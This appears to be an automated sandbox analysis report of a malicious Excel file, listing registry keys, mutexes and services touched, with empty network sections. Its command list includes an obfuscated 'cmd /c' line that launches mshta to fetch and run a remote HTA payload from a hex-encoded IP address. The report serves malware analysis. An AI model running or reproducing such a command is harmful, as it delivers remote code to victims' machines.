HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Containers\SecureAutoProxy
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableHttp2ConnectionSharing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableTlsAnonymousClientAuthFallback
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableProxyAuthenticationSchemes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableProxyLinkLocalNameResolution
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyQueryWithFullUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Containers\SendDnsToHost
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableCachingNegativeProxyResults
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableTcpFastOpen
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EdpEnforcementOverride
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions\TenantRestrictionsPlugin.dll\PolicySubPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions\TenantRestrictionsPlugin.dll\DllPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\QuicTestHost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER\*
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_ENABLE_HTTP2\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_ENABLE_HTTP2\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download\FeatureEnableIEHostOnlyCookies
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttpLowerCaseHost
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer\DisableKnownFolders
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\DefinitionFlags
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2527171340-3306644326-1278290521-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedPC\EduSharedPCMode
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\OOBE\LaunchUserOOBE
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{00000160-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\Extensions\DragDropExtension
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\TransientObjects\%5C%5C.%5CRpc%5CAllowLpacAppExperience%5CInterface\SecurityDescriptor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\SdbUpdates\DirectXApps.sdb
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\SdbUpdates\DisableDoubleQuerySdbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\C:\Windows\SysWOW64\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\C:\Windows\SysWOW64\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\LoginUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityStore\LoadParameters\{B16898C6-A148-4967-9171-64D755DA8520}\LoginUri
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityStore\LoadParameters\{B16898C6-A148-4967-9171-64D755DA8520}\EnterpriseAuthorityUri
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\FontCache\Parameters\ClientCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseSWRender
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\UseSWRender
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU\AdapterInfo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\ResourcePolicies
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ca-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ca-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cs-CZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cs-CZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\da-DK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\da-DK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\de-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\de-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\el-GR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\el-GR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es-ES_tradnl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es-ES_tradnl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fi-FI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fi-FI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fr-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fr-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hu-HU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hu-HU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nl-NL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nl-NL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nb-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nb-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pl-PL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pl-PL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pt-BR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pt-BR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ru-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ru-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sk-SK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sk-SK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sv-SE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sv-SE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tr-TR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tr-TR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sl-SI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sl-SI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\eu-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\eu-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es-MX
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es-MX
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pt-PT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pt-PT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fr-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fr-CA

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\1
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\6768
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\6768\0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UISnapshotLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\7te
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelWorkbookOpenedCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelPreviousSessionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SessionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\Placeholder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTimeExcel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0\StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTimeExcel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\a,k
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\15774E2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\15774E2\15774E2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\FileTypeBlockList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\OoxmlConverterBlockList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ImmersiveWorkbookDirtySentinel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelWorkbookAutoRecoverDirty
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe_queried
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle\ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\157E290
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\157E290\157E290
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO\FileActivityStoreVersion

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\6764\0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\7te
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe_queried
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe_expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\a,k

cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
"C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\FileCoAuth.exe" -Embedding
mshta http://0xb907d607/fer/fer.html

Global\ClickToRunPackageLocker
Local\SM0:6768:168:WilStaging_02
Local\SM0:6768:64:WilError_03
Office16.B1E641B5-F92B-4B82-83B7-10DC868435E8
Office.16.916BB0BF-2D21-4499-83C7-555DB4C3F8E8
{540C3015-CFCF-4C7C-85E7-E18AD81E4A31}16GovernanceAnonymousfloodgatecampaigns.json
{540C3015-CFCF-4C7C-85E7-E18AD81E4A31}16UserFactsAnonymousInsights.json
FLOODGATE.EXCEL.CAMPAIGNSTATES.JSON
Local\SessionImmersiveColorMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
3C98A163-8D7E-41B1-B10A-97B5BD62B79FUD
Local\F99C425F-9135-43ed-BD7D-396DE488DC53_Office16
_ClassificationAuditCacheMutex_
743DD871-568C-4AB6-8834-ABCE03440726-VER16
Local\MSCTF.Asm.MutexDefault1
CicLoadWinStaWinSta0
Local\MSCTF.CtfMonitorInstMutexDefault1
Local\WinSpl64To32Mutex_69e25_0_3000
Global\552FFA80-3393-423d-8671-7BA046BB5906
Global\MTX_MSO_Formal1_S-1-5-21-2527171340-3306644326-1278290521-1001
Global\MTX_MSO_AdHoc1_S-1-5-21-2527171340-3306644326-1278290521-1001
Local\Microsoft_Office_UsageMetricsStoreFileStore_16
Local\UsageMetrics_NLMicrosoft_Office_16_3319437661
Local\StorageWin32Mutex_Microsoft_Office_16_NamespaceLifecycle_3192105584
Local\Disco_Microsoft_Office_16_Catalog
Local\Disco_Microsoft_Office_16_MappingLock
Local\Disco_Shm_Microsoft_Office_16_MA_244114e7
Local\StorageWin32Mutex_Microsoft_Office_16_NamespaceLifecycle_3053820265
Local\Disco_Shm_Microsoft_Office_16_MA_4ae30326
Local\StorageWin32Mutex_Microsoft_Office_16_NamespaceLifecycle_1714717556
Local\Disco_Shm_Microsoft_Office_16_MA_d59f3ac3
Local\UsageMetrics_NLMicrosoft_Office_16_403077244
Local\StorageWin32Mutex_Microsoft_Office_16_NamespaceLifecycle_2168876221
Local\Disco_Shm_Microsoft_Office_16_MA_9e3e01b2
Local\Storage_Microsoft_Office_16_NM_Seq_236h3l5112q164l
Local\Disco_Shm_Microsoft_Office_16_MA_4a25a32f
Local\Disco_Shm_Microsoft_Office_16_MA_adce91cb
Local\Disco_Shm_Microsoft_Office_16_MA_f513c2fb
Local\Disco_Shm_Microsoft_Office_16_MA_8b3a1a2e
Local\SM0:6784:304:WilStaging_02
Local\SM0:5720:168:WilStaging_02
Local\SM0:6460:168:WilStaging_02
Local\SM0:6460:64:WilError_03

PrintWorkflowUserSvc_6cfae
WinHttpAutoProxySvc

No results

Sorry! No behavior.

Sorry! No tracee.

Sorry! No strace.

Sorry! No tracee.

No hosts contacted.

No TCP connections recorded.

No UDP connections recorded.

No domains contacted.

HTTP Requests

No HTTP(s) requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No Suricata Extracted files.

Sorry! No dropped files.

